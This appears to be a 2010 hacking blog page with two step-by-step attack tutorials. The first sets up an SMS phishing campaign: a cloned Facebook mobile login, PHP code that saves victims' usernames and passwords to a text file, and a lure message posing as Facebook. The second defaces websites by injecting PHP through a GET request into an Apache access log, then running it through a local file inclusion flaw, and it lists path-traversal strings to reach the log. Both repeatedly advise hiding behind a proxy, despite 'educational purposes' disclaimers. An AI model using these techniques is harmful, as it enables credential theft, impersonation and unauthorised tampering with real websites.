Monday, June 14, 2010

SMS phishing

NOTE: THIS TUTORIAL IS WRITTEN FOR EDUCATIONAL PURPOSES ONLY AND I TAKE NO RESPONSIBILITY OF WHAT YOU DO WITH THIS.

Here we are making fake mobile login of facebook.

What happens?
Victim receives a sms on his mobile apparently from facebook asking to try out new version of facebook. A link is provided in the sms. The victim opens the link, sees the facebook login page. He makes the login and it shows username/password is wrong. He gets phished...

To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.

Process:
SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com and copy the source code. Place it your web server's public html folder with ".htm" as extension. Open this html file in notepad and go to the form tag. In that, replace the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file as "index.htm". Create another file and name it as "write.php". Open write.php and copy the following content to the same. Save it.
[code]
<*?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?*>
[/code]
Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember to keep the name of directory something like facebook or similar.
Now start the server.




CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in address bar. You should see your phishing page or your default index.htm(if the files are stored in any directory under public html). If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections. So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. for example, my files are in /smsphish under public html. So, i'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in username and password field. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if our entered details are logged there. If they are, our work is mostly done. if they are not, check that you have made necessary changes in index.htm and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...


SENDING THE SMS.
Now you have to find free smsing sites which do not require to register. These sites use their own number for sending messeages. You can find many such sites. One word: Google. Now here comes our social engineering techniques. Just type the message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give link to our phishing page. A sample message would look like this.
[code]
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
[/code]
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use proxy) If he opens the message and link, he will see the normal facebook mobile login and if he enters the correct details, our phishing worked! just keep watch on pswd.txt for their details!
Note: Be careful when running server!

defacing when access.log is accessible

Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.

I have tested it on wampserver (apache version 2.2.11 dont know about others). So, here I am going to show how we can change/deface any page on the server if the access log is accessible.

How to access the access.log?
For that, you need to find a LFI vulnerability on target site. and from that LFI, you can include access log. Here are some probable locations of access.log.
../apache/logs/access.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
or simply you can use the dork (inurl:access.log). and you'll be surprised to see so many logs at handy!

Ok, so moving on...

If you find a website with access.log accessible, do the following steps.

make the following GET request to the website by means of telnet or anything else you wish.

GET /<*?php $vips='---DEFACED---'; $fp = fopen('--LOCATION OF THE WEBPAGE FROM LOG--', 'w'); fputs($fp, $vips); fclose($fp); ?*> HTTP/1.1

(remove the stars *)

but before making this GET request, you need to make some changes in it.. (double quotes in the GET request maybe escaped before logging, so, here i am not making use of them)
--DEFACED-- : you have to replace this by html code which will be placed as a defacement.
--LOCATION OF WEBPAGE FROM LOG-- : this is location of the webpage from the log. For example, if the log is in the directory 'logs' and webpage to deface is in the directory 'pages' and both are in directory 'web' then this value will be '../pages/index.htm' where index.htm is the name of page to deface.

after making these changes, make the get request to the website.

Here, what we have done, we have injected php code in access.log. what php code does, it changes the content of the index.htm to our provided html content. But this will happen only if we open access.log. So, now go to lfi page and include access.log from there or open the direct link to log which you may have found from dork.
The size of access.log maybe huge depending on popularity of website... but keep it loading.. after some time, when our malicious GET request will be loaded, then php code will be executed and if successful, we can see the defaced page... be sure to use a proxy! your ip address will be easily logged.